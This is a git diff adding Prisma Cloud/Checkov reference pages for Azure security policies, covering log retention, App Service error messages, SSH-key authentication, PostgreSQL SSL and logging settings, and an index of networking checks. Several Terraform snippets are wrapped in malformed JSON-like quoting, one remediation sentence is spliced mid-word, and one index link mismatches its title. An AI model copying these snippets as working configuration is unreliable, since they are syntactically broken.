"Recommendation" + } + + + + action { + action_group_id = azurerm_monitor_action_group.main.id + + webhook_properties = { + from = "terraform" + } + + } +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc new file mode 100644 index 000000000..41cd9eb30 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc @@ -0,0 +1,142 @@ +== Activity Log Retention should not be set to less than 365 days +// Activity Log retention less than 365 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a9937384-1ee3-430c-acda-fb97e357bfcd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py[CKV_AZURE_37] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +A log profile controls how the activity log is exported and retained. +Since the average time to detect a breach is 210 days, the activity log should be retained for 365 days or more, providing time to respond to any incidents. +We recommend you set activity log retention for 365 days or greater. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to the * Activity log*. + +. Select * Export*. + +. Set * Retention (days)* to * 365* or * 0*. + +. Click * Save*. + + +* CLI Command* + + +To set Activity log Retention (days) to * 365 or greater*, use the following command: +---- +az monitor log-profiles update +--name & lt;logProfileName> +--set retentionPolicy.days=& lt;number of days> retentionPolicy.enabled=true +---- +To store logs for fo + + +* Terrarever (indefinitely), use the following command:* + + +---- +az monitor log-profiles update +--name & lt;logProfileName> +--set retentionPolicy.days=0 retentionPolicy.enabled=false +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_monitor_log_profile +* *Arguments:* retention policy + + +*Option 1* + + + + +[source,go] +---- +{ + "resource "azurerm_monitor_log_profile" "example" { + name = "default" + categories = [ + "Action", + "Delete", + "Write", + ] + locations = [ + "westus", + "global", + ] ++ retention_policy { ++ enabled = true ++ days = 365 + } + +}", +} +---- + + +*Option 2* + + + + +[source,go] +---- +{ + "resource "azurerm_monitor_log_profile" "example" { + name = "default" + categories = [ + "Action", + "Delete", + "Write", + ] + locations = [ + "westus", + "global", + ] ++ retention_policy { ++ enabled = false ++ days = 0 + } + +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc new file mode 100644 index 000000000..929539036 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc @@ -0,0 +1,57 @@ +== App service disables detailed error messages +// Azure App Service detailed error messages disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bda56a63-e57e-4791-8a3e-e620c142cec2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py[CKV_AZURE_65] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Detailed error messages provide more information about an error that occurs in your app, such as the error code, the line of code where the error occurred, and a description of the error. +This information can be very useful for debugging issues with your app and identifying the root cause of the problem. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* detailed_error_messages_enabled + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ logs { ++ detailed_error_messages_enabled = true ++ } + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc new file mode 100644 index 000000000..c9a8ca963 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc @@ -0,0 +1,310 @@ +== Azure Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-networking-1.adoc[Azure instance does not authenticate using SSH keys] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstancePassword.py[CKV_AZURE_1] +|HIGH + + +|xref:bc-azr-networking-10.adoc[Azure PostgreSQL database server with SSL connection disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py[CKV_AZURE_29] +|MEDIUM + + +|xref:bc-azr-networking-11.adoc[Azure PostgreSQL database server with log checkpoints parameter disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py[CKV_AZURE_30] +|MEDIUM + + +|xref:bc-azr-networking-12.adoc[Azure PostgreSQL database server with log connections parameter disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py[CKV_AZURE_31] +|MEDIUM + + +|xref:bc-azr-networking-13.adoc[Azure PostgreSQL database server with connection throttling parameter is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py[CKV_AZURE_32] +|MEDIUM + + +|xref:bc-azr-networking-17.adoc[Azure MariaDB database server with SSL connection disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py[CKV_AZURE_47] +|HIGH + + +|xref:bc-azr-networking-2.adoc[Azure RDP Internet access is not restricted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py[CKV_AZURE_9] +|HIGH + + +|xref:bc-azr-networking-3.adoc[Azure Network Security Group allows all traffic on SSH (port 22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py[CKV_AZURE_10] +|HIGH + + +|xref:bc-azr-networking-4.adoc[Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] +|HIGH + + +|xref:bc-azr-networking-5.adoc[Azure App Service Web app doesn't redirect HTTP to HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py[CKV_AZURE_14] +|MEDIUM + + +|xref:bc-azr-networking-6.adoc[Azure App Service Web app doesn't use latest TLS version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py[CKV_AZURE_15] +|MEDIUM + + +|xref:bc-azr-networking-7.adoc[Azure App Service Web app client certificate is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AppServiceClientCertificate.py[CKV_AZURE_17] +|MEDIUM + + +|xref:bc-azr-networking-8.adoc[Azure App Service Web app doesn't use HTTP 2.0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py[CKV_AZURE_18] +|MEDIUM + + +|xref:bc-azr-networking-9.adoc[Azure MySQL Database Server SSL connection is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py[CKV_AZURE_28] +|MEDIUM + + +|xref:enable-trusted-microsoft-services-for-storage-account-access.adoc[Azure Storage Account 'Trusted Microsoft Services' access not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py[CKV_AZURE_36] +|MEDIUM + + +|xref:ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc[Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py[CKV_AZURE_135] +|MEDIUM + + +|xref:ensure-azure-acr-is-set-to-disable-public-networking.adoc[Azure Container registries Public access to All networks is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py[CKV_AZURE_139] +|LOW + + +|xref:ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc[Azure Redis Cache does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] +|LOW + + +|xref:ensure-azure-app-service-slot-has-debugging-disabled.adoc[Azure App service slot does not have debugging disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py[CKV_AZURE_155] +|LOW + + +|xref:ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc[Azure App's service slot does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py[CKV_AZURE_154] +|LOW + + +|xref:ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc[Azure Cognitive Services accounts enable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py[CKV_AZURE_134] +|LOW + + +|xref:ensure-azure-databricks-workspace-is-not-public.adoc[Azure Databricks workspace is public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py[CKV_AZURE_158] +|LOW + + +|xref:ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc[Azure Function app does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py[CKV_AZURE_145] +|LOW + + +|xref:ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc[Azure HTTP (port 80) access from the internet is not restricted] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_160] +|LOW + + +|xref:ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc[Azure Machine Learning Workspace is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLPublicAccess.py[CKV_AZURE_144] +|LOW + + +|xref:ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc[Azure PostgreSQL does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py[CKV_AZURE_147] +|LOW + + +|xref:ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc[Azure Redis Cache does not use the latest version of TLS encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py[CKV_AZURE_148] +|LOW + + +|xref:ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc[Azure Spring Cloud API Portal is not enabled for HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py[CKV_AZURE_161] +|LOW + + +|xref:ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc[Azure Spring Cloud API Portal Public Access Is Enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py[CKV_AZURE_162] +|LOW + + +|xref:ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc[Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py[CKV_AZURE_153] +|LOW + + + +|xref:ensure-cosmos-db-accounts-have-restricted-access.adoc[Cosmos DB accounts do not have restricted access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py[CKV_AZURE_99] +|LOW + + +|xref:ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc[Azure Front Door Web application firewall (WAF) policy rule for Remote Command Execution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py[CKV_AZURE_133] +|MEDIUM + + +|xref:ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc[public network access enabled' is not set to 'False' for mySQL servers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py[CKV_AZURE_53] +|MEDIUM + + +|xref:ensure-that-api-management-services-uses-virtual-networks.adoc[API management services do not use virtual networks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py[CKV_AZURE_107] +|LOW + + +|xref:ensure-that-application-gateway-enables-waf.adoc[Azure application gateway does not have WAF enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_120] +|LOW + + +|xref:ensure-that-application-gateway-uses-waf-in-detection-or-prevention-modes.adoc[Application gateway does not use WAF in Detection or Prevention modes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py[CKV_AZURE_122] +|LOW + + +|xref:ensure-that-azure-cache-for-redis-disables-public-network-access.adoc[Azure cache for Redis has public network access enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py[CKV_AZURE_89] +|LOW + + +|xref:ensure-that-azure-cognitive-search-disables-public-network-access.adoc[Azure cognitive search does not disable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py[CKV_AZURE_124] +|LOW + + +|xref:ensure-that-azure-container-container-group-is-deployed-into-virtual-network.adoc[Azure container container group is not deployed into a virtual network] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py[CKV_AZURE_98] +|LOW + + +|xref:ensure-that-azure-cosmos-db-disables-public-network-access.adoc[Azure Cosmos DB enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py[CKV_AZURE_101] +|LOW + + +|xref:ensure-that-azure-data-factory-public-network-access-is-disabled.adoc[Azure Data Factory (V2) configured with overly permissive network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py[CKV_AZURE_104] +|HIGH + + +|xref:ensure-that-azure-event-grid-domain-public-network-access-is-disabled.adoc[Azure Event Grid domain public network access is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py[CKV_AZURE_106] +|MEDIUM + + +|xref:ensure-that-azure-file-sync-disables-public-network-access.adoc[Azure file sync enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py[CKV_AZURE_64] +|LOW + + +|xref:ensure-that-azure-front-door-enables-waf.adoc[Azure Front Door does not have the Azure Web application firewall (WAF) enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py[CKV_AZURE_121] +|MEDIUM + + +|xref:ensure-that-azure-front-door-uses-waf-in-detection-or-prevention-modes.adoc[Azure front door does not use WAF in Detection or Prevention modes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py[CKV_AZURE_123] +|LOW + + +|xref:ensure-that-azure-iot-hub-disables-public-network-access.adoc[Azure IoT Hub enables public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py[CKV_AZURE_108] +|MEDIUM + + +|xref:ensure-that-azure-synapse-workspaces-enables-managed-virtual-networks.adoc[Azure Synapse Workspaces do not enable managed virtual networks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py[CKV_AZURE_58] +|LOW + + +|xref:ensure-that-azure-synapse-workspaces-have-no-ip-firewall-rules-attached.adoc[Azure Synapse workspaces have IP firewall rules attached] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml[CKV2_AZURE_19] +|LOW + + +|xref:ensure-that-function-apps-is-only-accessible-over-https.adoc[Azure Function App doesn't redirect HTTP to HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py[CKV_AZURE_70] +|MEDIUM + + +|xref:ensure-that-key-vault-allows-firewall-rules-settings.adoc[Key vault does not allow firewall rules settings] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py[CKV_AZURE_109] +|MEDIUM + + +|xref:ensure-that-network-interfaces-disable-ip-forwarding.adoc[Azure Virtual machine NIC has IP forwarding enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py[CKV_AZURE_118] +|MEDIUM + + +|xref:ensure-that-network-interfaces-dont-use-public-ips.adoc[Network interfaces use public IPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_119] +|LOW + + +|xref:ensure-that-only-ssl-are-enabled-for-cache-for-redis.adoc[Not only SSL are enabled for cache for Redis] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py[CKV_AZURE_91] +|LOW + + +|xref:ensure-that-postgresql-server-disables-public-network-access.adoc[PostgreSQL server does not disable public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py[CKV_AZURE_68] +|LOW + + +|xref:ensure-that-sql-server-disables-public-network-access.adoc[SQL Server is enabled for public network access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py[CKV_AZURE_113] +|LOW + + +|xref:ensure-that-storage-account-enables-secure-transfer.adoc[Storage Accounts without Secure transfer enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountEnablesSecureTransfer.py[CKV_AZURE_60] +|MEDIUM + + +|xref:ensure-that-storage-accounts-disallow-public-access.adoc[Azure storage account does allow public access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py[CKV_AZURE_59] +|LOW + + +|xref:ensure-that-udp-services-are-restricted-from-the-internet.adoc[Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py[CKV_AZURE_77] +|HIGH + + +|xref:set-default-network-access-rule-for-storage-accounts-to-deny.adoc[Azure Storage Account default network access is set to 'Allow'] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py[CKV_AZURE_35] +|MEDIUM + + +|xref:set-public-access-level-to-private-for-blob-containers.adoc[Azure storage account has a blob container that is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py[CKV_AZURE_34] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc new file mode 100644 index 000000000..bbe32f400 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-1.adoc @@ -0,0 +1,132 @@ +== Azure instance does not authenticate using SSH keys +// Azure instance not authenticated through SSH + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7f59ef1f-0cbe-48cf-8358-05013b6a8a95 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstancePassword.py[CKV_AZURE_1] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +SSH is an encrypted connection protocol that allows secure sign-ins over unsecured connections. +SSH is the default connection protocol for Linux VMs hosted in Azure. +Using secure shell (SSH) key pairs, it is possible to spin up a Linux virtual machine on Azure that defaults to using SSH keys for authentication, eliminating the need for passwords to sign in. +We recommend connecting to a VM using SSH keys. +Using basic authentication with SSH connections leaves VMs vulnerable to brute-force attacks or guessing of passwords. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Enter * virtual machines* in the search bar. + +. Under* Services*, select * Virtual machines*. + +. Under * Administrator account*, select * SSH public key*. + +. For * SSH public key source*, use the default * Generate new key pair*, then for * Key pair name* enter * myKey*. + +. Under * Inbound port rules* > * Public inbound ports*, select * Allow selected ports*, then select * SSH (22)* and * HTTP (80)* from the drop-down. + +. Leave the remaining defaults settings. ++ +At the bottom of the page click * Review + create*. + + +* CLI Command* + + +The --generate-ssh-keys parameter is used to automatically generate an SSH key, and put it in the default key location (~/.ssh). + + +[source,shell] +---- +{ + "az vm create \\ + --resource-group myResourceGroup \\ + --name myVM \\ + --image UbuntuLTS \\ + --admin-username azureuser \\ + --generate-ssh-keys", +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_linux_virtual_machine +* *Arguments:* admin_ssh_key + + +[source,go] +---- +{ + "resource "azurerm_linux_virtual_machine" "example" { + ... + ++ admin_ssh_key { + username = "adminuser" + public_key = file("~/.ssh/id_rsa.pub") + }", + + +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.Compute/virtualMachines +* *Arguments:* disablePasswordAuthentication + + +[source,go] +---- +{ + "... + "linuxConfiguration": { ++ "disablePasswordAuthentication": "true", + "ssh": { + "publicKeys": [ + { + "path": "string", + "keyData": "string" + } + + ] + + ...", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc new file mode 100644 index 000000000..3d821bc83 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10.adoc @@ -0,0 +1,87 @@ +== Azure PostgreSQL database server with SSL connection disabled +// Azure PostgreSQL Database Server SSL connection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bf4ad407-076c-40b9-a8fa-a0c80352a744 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py[CKV_AZURE_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +*SSL connectivity* provides a new layer of security by connecting a database server to client applications using a Secure Sockets Layer (SSL). +Enforcing SSL connections between a database server and client applications helps protect against _man-in-the-middle_ attacks. +This is achieved by encrypting the data stream between the server and application. +We recommend you set *Enforce SSL connection* to** Enable** on PostgreSQL Server databases. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Azure Database* for * PostgreSQL server*. + +. For each database: a) Click * Connection security*. ++ +b) Navigate to *SSL Settings **section. ++ +c) To * Enforce SSL connection* click * ENABLED*. + + +* CLI Command* + + +To set * Enforce SSL Connection* for a* PostgreSQL Database**, use the following command: +---- +az postgres server update +--resource-group & lt;resourceGroupName> +--name & lt;serverName> +--ssl-enforcement Enabled +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* ssl_enforcement_enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "example" { + ... + + ssl_enforcement_enabled = true +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc new file mode 100644 index 000000000..c0475fa01 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11.adoc @@ -0,0 +1,92 @@ +== Azure PostgreSQL database server with log checkpoints parameter disabled +// Azure PostgreSQL Database Server 'log checkpoints' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 703f7b61-be54-4b6f-be1d-bab81899ec87 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py[CKV_AZURE_30] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *log_checkpoints* helps the PostgreSQL Database to log each checkpoint and generate query and error logs. +Access to transaction logs is not supported. +Query and error logs can be used to identify, troubleshoot, repair configuration errors, and address sub-optimal performance issues. +We recommend you set *log_checkpoints* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to Azure Database for PostgreSQL server. + +. For each database: a) Click * Server* parameters. ++ +b) Navigate to * log_checkpoints*. ++ +c) Click * On*. ++ +d) Click * Save*. + + +* CLI Command* + + +To update the * log_checkpoints* configuration, use the following command: +---- +az postgres server configuration set +--resource-group & lt;resourceGroupName> +--server-name & lt;serverName> +--name log_checkpoints +--value on +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +{ + "- resource "azurerm_postgresql_configuration" "example" { +- name = "log_checkpoints" +- resource_group_name = data.azurerm_resource_group.example.name +- server_name = azurerm_postgresql_server.example.name +- value = "off" +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc new file mode 100644 index 000000000..647f8a399 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12.adoc @@ -0,0 +1,90 @@ +== Azure PostgreSQL database server with log connections parameter disabled +// Azure PostgreSQL Database Server 'log connections' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8673dba3-9bf5-4691-826e-b5fc7be70dad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py[CKV_AZURE_31] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Enabling *log_connections* allows a PostgreSQL Database to log attempted connections to the server in addition to logging the successful completion of client authentication. +Log data can be used to identify, troubleshoot, repair configuration errors, and identify sub-optimal performance issues. +We recommend you set *log_connections* to *On* for PostgreSQL Server Databases. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Azure Database* for * PostgreSQL server*. + +. For each database: a) Click * Server* parameters. ++ +b) Navigate to * log_connections*. ++ +c) Click * On*. ++ +d) Click * Save*. + + +* CLI Command* + + +To update the * log_connections* configuration, use the following command: +---- +az postgres server configuration set +--resource-group & lt;resourceGroupName> +--server-name & lt;serverName> +--name log_connections +--value on +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_configuration +* *Arguments:* name + value + + +[source,go] +---- +{ + "- resource "azurerm_postgresql_configuration" "example" { +- name = "log_connections" +- resource_group_name = data.azurerm_resource_group.example.name +- server_name = azurerm_postgresql_server.example.name +- value = "off" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc new file mode 100644 index 000000000..35f413ee3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13.adoc @@ -0,0 +1,93 @@ +== Azure PostgreSQL database server with connection throttling parameter is disabled +// Azure PostgreSQL Database Server 'connection throttling' parameter disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 43d57e9b-6080-4608-bbe3-e31611b5d240 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py[CKV_AZURE_32] + 